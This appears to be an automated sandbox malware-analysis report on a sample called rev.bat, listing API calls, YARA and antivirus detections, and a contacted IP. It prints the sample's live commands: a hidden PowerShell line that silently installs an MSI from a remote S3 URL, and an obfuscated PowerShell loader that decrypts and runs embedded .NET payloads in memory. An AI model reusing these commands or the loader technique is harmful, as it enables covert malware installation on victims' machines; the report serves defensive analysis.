NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\rev.bat
cmdline	powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'msiexec.exe' -ArgumentList '/i', 'https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi', '/qn' -Wait -WindowStyle Hidden"
cmdline	powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 20"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 11, 2023, 9:59 a.m.	thread_identifier: 2924 thread_handle: 0x00000090 process_identifier: 2920 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 20" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 11, 2023, 9:59 a.m.	thread_identifier: 1152 thread_handle: 0x00000084 process_identifier: 2056 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'msiexec.exe' -ArgumentList '/i', 'https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi', '/qn' -Wait -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
ShellExecuteExW July 11, 2023, 9:59 a.m.	show_type: 0 filepath_r: C:\Windows\system32\msiexec.exe parameters: /i https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi /qn filepath: C:\Windows\System32\msiexec.exe	1	1

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Avast	Other:Malware-gen [Trj]
Fortinet	BAT/Kryptik.FU!tr
AVG	Other:Malware-gen [Trj]

Checks for the Locally Unique Identifier on the system for a suspicious privilege (19 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW July 11, 2023, 9:59 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\rev.bat

cmdline

"C:\Users\test22\AppData\Local\Temp\rev.bat.exe" -w hidden -c $Rwyy='ReYnHaaYnHadLiYnHanesYnHa'.Replace('YnHa', '');$PmMk='TraYnHansYnHafoYnHarmYnHaFinaYnHalYnHaBlYnHaockYnHa'.Replace('YnHa', '');$MfYp='FirYnHastYnHa'.Replace('YnHa', '');$kVgj='FroYnHamYnHaBYnHaasYnHae6YnHa4StYnHariYnHangYnHa'.Replace('YnHa', '');$aHWr='ChYnHaanYnHageExYnHatenYnHasiYnHaonYnHa'.Replace('YnHa', '');$gqav='GYnHaetCYnHaurrYnHaenYnHatPrYnHaocesYnHasYnHa'.Replace('YnHa', '');$DHcv='SplYnHaitYnHa'.Replace('YnHa', '');$EEdg='EnYnHatYnHarYnHayYnHaPoYnHaintYnHa'.Replace('YnHa', '');$tcdy='MaYnHaiYnHanYnHaMoYnHaduleYnHa'.Replace('YnHa', '');$aFEC='IYnHanvYnHaokeYnHa'.Replace('YnHa', '');$XlVq='LoadYnHa'.Replace('YnHa', '');$jaIs='CYnHareaYnHateYnHaDecrYnHayYnHapYnHatorYnHa'.Replace('YnHa', '');function tWkWm($tIqHx){$gvkKA=[System.Security.Cryptography.Aes]::Create();$gvkKA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gvkKA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$gvkKA.Key=[System.Convert]::$kVgj('M9sMpwxY1XjodXbV6oJ2kek50ehlInCYuwfh/CjlMzc=');$gvkKA.IV=[System.Convert]::$kVgj('EClXKP7rmyoRnUX3gynDag==');$BjrdS=$gvkKA.$jaIs();$MTfir=$BjrdS.$PmMk($tIqHx,0,$tIqHx.Length);$BjrdS.Dispose();$gvkKA.Dispose();$MTfir;}function voAuL($tIqHx){$WKDaM=New-Object System.IO.MemoryStream(,$tIqHx);$vEUKC=New-Object System.IO.MemoryStream;$TsvRU=New-Object System.IO.Compression.GZipStream($WKDaM,[IO.Compression.CompressionMode]::Decompress);$TsvRU.CopyTo($vEUKC);$TsvRU.Dispose();$WKDaM.Dispose();$vEUKC.Dispose();$vEUKC.ToArray();}$UYevX=[System.Linq.Enumerable]::$MfYp([System.IO.File]::$Rwyy([System.IO.Path]::$aHWr([System.Diagnostics.Process]::$gqav().$tcdy.FileName, $null)));$UFUei=$UYevX.Substring(3).$DHcv(':');$qRpdv=voAuL (tWkWm ([Convert]::$kVgj($UFUei[0])));$mLDah=voAuL (tWkWm ([Convert]::$kVgj($UFUei[1])));[System.Reflection.Assembly]::$XlVq([byte[]]$mLDah).$EEdg.$aFEC($null,$null);[System.Reflection.Assembly]::$XlVq([byte[]]$qRpdv).$EEdg.$aFEC($null,$null);

Communicates with host for which no DNS query was performed (1 event)

host

185.157.162.126

A process attempted to delay the analysis task. (1 event)

description

powershell.exe tried to sleep 5456326 seconds, actually delayed analysis time by 5456326 seconds

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\system32\msiexec.exe" /i https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi /qn
parent_process	powershell.exe				martian_process	C:\Windows\System32\msiexec.exe /i https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi /qn

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2628 resumed a thread in remote process 2740
NtResumeThread July 11, 2023, 9:59 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2740	1	0	0

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-windowstyle hidden				value	Attempts to execute command with a hidden window

rev.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All